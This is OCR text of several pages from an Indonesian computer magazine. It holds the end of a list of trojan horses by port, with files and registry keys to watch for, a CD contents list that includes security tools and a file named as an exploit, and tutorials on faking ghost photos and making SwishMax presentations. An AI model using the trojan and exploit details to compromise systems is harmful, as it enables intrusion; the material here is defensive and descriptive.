kemampuan unik yaitu merusak monitor. Kabarnya                      browser untuk masuk ke site yg telah ditentukan dll.
program ini mereset resolusi layar dan merubah refresh
rate dari layar juga. File yang perlu diwaspadai adalah
windown.exe dan pada registry bisa kita lihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunService
(Key: SystemTray).
46. Port 35000
Infector adalah remote akses Trojan yang di compile
menggunakan Borland Delphi 5 dan memiliki kemam-
puan seperti menutup server, merubah port, mengganti
password, restart/shutdown sistem, log off user dll. File
yang perlu diwaspadai adalah d3x.drv, FC32.exe,                                                              Gambar 9. Sub Seven
apxil32.exe, dan setup.int pada direktori windows.                                                           Apocalypse

                                                                                                   Vol. IV No. 11 NeoTek         43
                   NeoRagam

                                                                                                   daftar isi cd neotek
SPYREMOVAL                                                                SMARTPHONE
Adaware SE                      adaware se.exe                            MobileReversi               reversisp11.zip
Adaware Tools                   regh.exe                                  OmetaChess                  ornetachess_setup.exe
                                SKIN_greyscaled.zip                       OrnetaFTP                   ornetaftp_setup.exe
                                SKIN_mediumblue.zip                       TrendMicro MobileSecurity   tmms-v10-build1147.zip
                                SKIN_testskin.zip                         Tube Singapore              tube_v205_sp_singapore.zip
                                update definition
BPS-Spyware Remove              BPS-Spyware Remove.zip
Omnisquad                       Omnisquad_antispyl.zip
Process Explore                 procexpamd64.zip
                                procex9x.zip
                                procexnt.zip
ZeroSpyware                     ZeroAds_Downloader.exe
                                ZeroSpy2004 Downloader.exe
                                ZNetHistory_Downloader.exe
HONEYPOT
Honeyd Linux                    honeyd-0.8.tar                            POCKET PC
                                honeyd-0.8a.tar                           Application                 Pocketcmd_sh3_setup.exe
                                honeyd-0.8b.tar                                                       Pocketcmd_arm_setup.exe
                                honeyd-1.0.tar                                                        Pocketcmd_mips_setup.exe
                                honeyd-0.8.tar.gz.sig                                                 MSASYNC.exe
                                                                                                      evt2002web_min.exe
                                honeyd-0.8a.tar.gz.sig                                                692-CF-DEV.exe
                                honeyd-0.8b.tar.gz.sig                    SDK                         PortSDK.exe
                                honeyd-1.0.tar.gz.sig                                                 handheldPCPro30SDK.exe
Honeyd Windows                  honeyd.exe                                                            HandheldPC20SDK.exe
                                honeyd-0.5-win32.zip                      Source                      adoce.zip
                                honeyd-0.5-win32.diff                                                 adoceSample.zip
                                                                                                      api.zip
                                honeyd-0.5a-win32                                                     ceNotepad.zip
                                dsniff-1.8-win32-static                                               commandbar.zip
                                libdnet-1.5-msvc.zip                                                  database1.zip
                                libdnet-1.5-msvc.diff                                                 datepick.zip
                                libdnet-1.7-msvc.zip                                                  ePhoto Album.zip
                                libevent-0.6-win32.zip                                                EVBPPC2002.zip
                                libevent-0.6-win32.diff                                               file_system.zip
                                                                                                      FingerCell_sample_DB.zip
                                libevent-0.7c-msvc.zip                                                FingerCellDemoPocketPC.zip
                                libnids-1.13-win32                                                    ftpclient_demo.zip
                                libnids-1.14-win32.zip                                                ftpclient_src.zip
                                libnids-1.16-win32.zip                                                menusample.zip
                                scanlogd-2.2-win32.zip                                                modal.zip
                                snort-1.6.2.2-win32-static.zip                                        pkcrt_pocketpc.zip
                                                                                                      pocketaccess.zip
                                snort-1.6.3-win32-static.zip                                          PocketCmd.zip
                                snort-1.6-win32-static.zip                                            registry.zip
                                snort-1.7-win32-FlexRESP-static.zip                                   speak.zip
                                snort-1.7-win32-MySQL-static.zip                                      vbcesu.zip
                                snort-1.7-win32-static.zip                                            zinc_evb_apps_portable_abstract.zip
                                snort.panel.zip                                                       zinc_evb_aspritece.zip
                                                                                                      zinc_evb_cryptotext.zip
                                WinPcap_3_0_a.exe                                                     zinc_eVB_RAS_and_FTP_ver6.zip
Honeyd Tools                    arpd-0.2.tar.gz                                                       zinc_evb_skinnable_keyboard.zip
                                honeycomb-0.6.tar.gz                                                  CF.zip
                                nttlscan-0.1.tar.gz                                                   evb skin-key.zip
HoneyWeb                        HoneyWeb-0.4.tgz                                                      ScreenProject.zip
Jackpot                         jackpot-1.2.2.zip                         PocketPC Paper              ADOCE (ActiveX Data Objects for CE).txt
Honeypot                        honeypot-backofficer-friendly-1.0.1.tar                               ce-serial-flaws.pdf
                                honeypot-shoneypot-0.2-7.tar.gz                                       ceutilsinstall.doc
Honey Paper                     honeycomb.ppt                                                         dinotext.pdf
                                honeycomb-poster-sc2003.pdf                                           Documentation - Version 20.txt
                                honeycomb-poster-paper-sc2003.pdf                                     FC_12_EDK.pdf
                                honeycomb-slides.pdf                                                  TiffanySC.pdf
                                honeycomb-hotnetsII.pdf                   PROYEK
                                norm.ps.gz                                Lampiran_ASM 468            _468.txt
                                                                          Lampiran_Utilman            Utilman_exploit.txt
JAVA                                                                      Lampiran-evb_plot3d         lampiran-codes_evb_plot3d.txt
JRE 1.3.1_1_15 Solaris SPARCH j2re-1_3_1_15-solaris-sparc.sh                                          Plot3D.zip
JRE 1.3.1_1_15 Solaris x86     j2re-1_3_1_15-solaris-i586.sh              Lampiran-evb_puzzle         lampiran-codes_evb_puzzle.txt
JRE 1.3.1_1_15 Windows         j2re-1_3_1_15-windows-i586-i.exe                                       Puzzle.zip
                               j2re-1_3_1_15-windows-i586                 Lampiran-evb_tictactoe      lampiran-codes_evb_tictactoe.txt
JSDK 1.3.1_1_15 Solaris Sparch j2sdk-1_3_1_15-solaris-sparc.sh                                        evb_TicTacToe.zip
                               j2sdk-1_3_1_15-solaris-sparc[1].tar.gz     GAMES
JSDK 1.3.1_1_15 Solaris x86    j2sdk-1_3_1_15-solaris-i586.sh             Empire Earth II             si_empireearth_demo.exe
JSDK1.3.1_1_15 Windows         j2sdk-1_3_1_15-windows-i586.exe            DirectX8_1                  Directx8_1.exe

44     NeoTek Vol. IV No. 11
                                                                                         NeoStyle


                                                                           PHOTO EDITING
                     PhotoImpact - Clone Effect
   Merekayasa photo baik itu photo koleksi pribadi ataupun photo koleksi keluarga untuk tujuan
    artisitik, ternyata dapat dengan mudah dilakukan. Andi Ismayadi (fuzk3_kendi@yahoo.com)
 membeberkan teknik photo editing dengan melakukan efek kloning dimana menempatkan obyek
                                     hantu (penampakan hantu) ke dalam sebuah photo yang lain.

 K
         ETIKA ANDA MENJELAJAH DI INTERNET PADA SEBUAH      Tentunya anda harus mempunyai software ini terlebih
         situs horor, anda melihat sebuah photo dimana      dahulu untuk itu silahkan kunjungi situs Ulead di
         terlihat terlihat sebuah penampakan seperti        www.ulead.com, tentunya selain PhotoImpact, ada banyak
hantu. Anda pun yakin itu adalah hasil rekayasa, karena     software lainnya dalam hal editing yang pernah dibahas
pantulan bayangan hantu itu ada di lantai. Bagaimana bisa   sebelumnya yaitu Video Editing dan Ulead Video Studio 7.
ya? Itu adalah rekayasa pada photo dengan menggunakan       Untuk itu tidak ada ruginya anda melihat-lihat situsnya.
efek clonning, bisa memakai Adobe Photoshop ataupun         Setelah instalasi Ulead PhotoImpact, sekarang mari kita
software lainnya. Kali ini kita akan membahasnya di         merekayasa sebuah photo dengan penampakan hantu.
Ulead PhotoImpact yang merupakan saingan Adobe              Pertama, siapkan photo-photo yang akan di kloning, un-
Photoshop karena kemudahannya.                              tuk itu photo pertama adalah photo dasar yang akan di
                                                            beri efek kloning, photo kedua adalah photo yang akan di
                                                            kloning. Dalam contoh ini, jelangkung2.jpg akan kita
                                                            masukan hasil kloningnya ke file dasar1.jpg.
                                                            Kedua, buka photo-photo tersebut dalam lingkung kerja
                                                            PhotoImpact. Pada tahap ini yang perlu dilakukan adalah
                                                            menyamakan ukuran kedua photo. Disini kita akan mela-
                                                            kukan klon hantu yang berbaju putih, untuk itu ukuran
                                                            pada jelangkung2.jpg disamakan ukurannya dengan foto
                                                            dasar yaitu berukuran 640x480. Caranya pada Main
                                                            Toolbar, Format>Image Size atau menekan tombol
                                                            CTRL+G, lalu akan keluar dari menu setting ukuran
                                                            gambar, pilih Standart yang berukuran 640x480.
                                                            Ketiga, selanjutnya adalah menyamakan setting keadaan
                                                            gambar, apakah gelap atau terang. Dalam hal ini,
                                                            dasar1.jpg mendekati gelap, sedangkan jelangkung2.jpg
                                                            kebalikannya yaitu terang. Untuk itu kita harus mengge-
                                                            lapkan sedikit jelangkung2.jpg. Caranya adalah dengan
                                                            memakai burn brush tools di easypalletes properties.
Gambar 1. Penampakan dalam film Jelangkung
                                                            Tekan F2, lalu akan muncul Palletes Properties. Disini ter-
                                                                                            sedia banyak efek-efek
                                                                                            yang dapat digunakan
                                                                                            untuk mengedit gambar.
                                                                                            Untuk menggelapkan
                                                                                            gambar, pilih Brush
                                                                                            Gallery>Retouch Tools
                                                                                            dan klik dua kali efek
                                                                                            Wide Burn. Setelah di-
                                                                                            pilih akan muncul Brush
                                                                                            panel, ini adalah properti
                                                                                            dari pointing brush anda.
                                                                                            Untuk menentukan uku-
                                                                                            ran besar kecilnya brush
                                                                                            point dapat diatur.
                                                                                             Keempat, setelah semua
                                                                                             properti yang disebutkan
                                                                                             di-setting, anda tinggal
                                                                                             bakar warna yang terlalu
                                                                                             terang dengan berpato-
                                                                                             kan kepada dasar1.jpg
                                                                                             sehingga bakaran anda
                                                                                             tidak terlalu berlebihan.
                                                                                             Kelima, apabila gambar
Gambar 2. Photo-photo yang akan di kloning

                                                                                         Vol. IV No. 11 NeoTek     45
                     NeoStyle

                                               dasar anda rada buram atau kabur, itu berarti terdapat efek
                                               Blur di dalamnya. Untuk itu anda dapat sesuaikan pada
                                               Brush Gallery>Retouch Tools dan klik dua kali efek Slight
                                               Blur. Dan masih banyak lagi efek-efek yang terdapat pada
                                               Ulead PhotoImpact, silahkan anda mencobanya sendiri
                                               Keenam, saatnya melakukan kloning. Buka clone properti
                                               di Gallery>Clone Tools lalu klik dua kali di Reflection 2,
                                               akan muncul lagi point brush-nya. Setelah di setting,
                                               arahkan kursor ke photo yang akan di kloning, terlihat
                                               kursor berubah menjadi tanda plus (+). Bidik atau tetap-
                                               kan titik permulaan untuk kloning kemudian tekan tom-
                                               bol SHIFT sembari mengklik titik tetapan tadi. Apabila
                                               anda tidak menekan tombol SHIFT maka ada pesan error.
                                               Ketujuh, setelah itu pindahkan kursor ke gambar dasar
                                               untuk melakukan kloning pada obyek yang akan di
                                               kloning, jangan lupa untuk menentukan lokasi kloning
Gambar 3. Pesan error
                                               itu berada. Untuk itu cari yang sekiranya tidak terlalu
                                               mencolok mata agar hasil kloning anda tidak mudah di-




Gambar 4. Penempatan kloning                   Gambar 6. Hasil akhir efek kloning


                                                                                    ketahui oleh orang dan
                                                                                    jangan terlalu memaksa-
                                                                                    kan lokasinya, penem-
                                                                                    patan yang baik adalah
                                                                                    dalam keadaan gelap.
                                                                                    Tahan klik kiri mouse
                                                                                    anda kemudian tarik ke
                                                                                    bawah. Untuk mening-
                                                                                    katkan akurasi dalam
                                                                                    proses kloning ini,
                                                                                    sebaiknya zoom photo
                                                                                    dasar sehingga terlihat
                                                                                    garis pemisah antara
                                                                                    obyek yang di kloning
                                                                                    dengan foto dasar. Ber-
                                                                                    sabar dan teliti adalah
                                                                                    kunci untuk mendapat-
                                                                                    kan hasil yang maksimal.
                                                                                    Kedelapan, akhir dari
                                                                                    segalanya adalah jangan
                                                                                    lupa untuk menyimpan
                                                                                    (save) pekerjaan anda
                                                                                    tersebut. Kini anda telah
                                                                                    menciptakan sebuah
                                                                                    photo dengan efek clone.

Gambar 5. Penempatan kloning lebih dari satu

46    NeoTek Vol. IV No. 11
                                                                                           NeoStyle


                                                                                         SWISHMAX
         Membuat Presentasi Animasi
   Biasa mengikuti seminar? Jika jawabannya “Iya”, maka anda pasti sering melihat pertunjukan
      presentasi yang menarik. Aditya Hadiwijaya (Be_blank@yahoo.com) memberikan teknik
membuat presentasi yang menarik dan memiliki animasi untuk menghasilkan presentasi yang baik.



 S
        AAT INI ADA BEBERAPA SOFTWARE YANG DAPAT              Ketiga, pada jendela yang paling kiri klik Up State & Hit
        dipakai untuk membuat presentasi. Tapi anda           State lalu klik insert Sprite dan langsung klik Text pada
        tentunya merasa bosan dengan animasi yang di-         jendela Tools lalu klik dan drag pada jendela Layout.
tampilkan. Apalagi bila animasinya tidak berjalan dengan
baik sewaktu anda menjalankannya pada saat seminar,
karena software yang anda gunakan lebih baru daripada
software yang digunakan pada saat seminar. Lalu, apa
solusinya?
SwishMax-lah solusinya. Software ini bisa digunakan un-
tuk apa saja, walaupun tidak selengkap flash, tetapi sangat
mudah untuk digunakan. Selanjutnya akan saya jelaskan
bagaimana cara membuat presentasi dengan SwishMax.
Pertama, aktifkan SwishMax anda dan pilih warna
background sesuai dengan selera. Kemudian ubah ukuran
movie-nya menjadi Width: 970 dan Height: 570.




                                                              Keempat, pada jendela Text ketiklah sesuatu, misalnya
                                                              pembukaan. Lakukan hal yang sama pada Down State dan
                                                              Over State (text yang diketik harus sama).




Kedua, klik insert sprite dan insert button lalu drag kotak
yang keluar di tempat yang anda inginkan. Klik button di
jendela paling kiri dan di jendela yang paling kanan. Pada
jendela yang paling kanan klik has separate over state dan
has separate down state.
                                                              Kelima, ketiganya disamakan posisinya (pada jendela
                                                              paling kanan klik transform lalu samakan nilai X dan Y-
                                                              nya pada text dan sprite-nya).




                                                                                            Vol. IV No. 11 NeoTek    47
                    NeoStyle

Keenam, lalu pada jendela paling kanan klik text. Pada         Kesembilan, klik insert scene dan di jendela paling kanan
jendela time line, klik kanan time line text lalu pilih efek   muncul scene 2. Copy button yang telah anda buat pada
yang anda inginkan.                                            posisi yang sama. Lakukan hal yang sama seperti di atas.




                                                               Kesepuluh, klik Button pada scene 1 di jendela paling kiri.
Ketujuh, pada jendela yang paling kanan klik scene 1, lalu     Klik script lalu Add Script Movie Control ' gotoAndPlay '
pada jendela time line, di frame ke-20 klik kanan time         gotoAndPlay(FRAME). Pada option Target pilih Scene 2.
line scene 1 lalu Movie Control' stop ().




                                                               keduabelas, langkah terakhir adalah meng-export
                                                               presentasi yang telah anda buat. Untuk presentasi, export
Kedelapan, lalu klik text dan buatlah text untuk               presentasi anda dalam bentuk SWF, HTML+SWF, atau
presentasi anda.                                               EXE (jangan AVI).




48   NeoTek Vol. IV No. 11

								
To top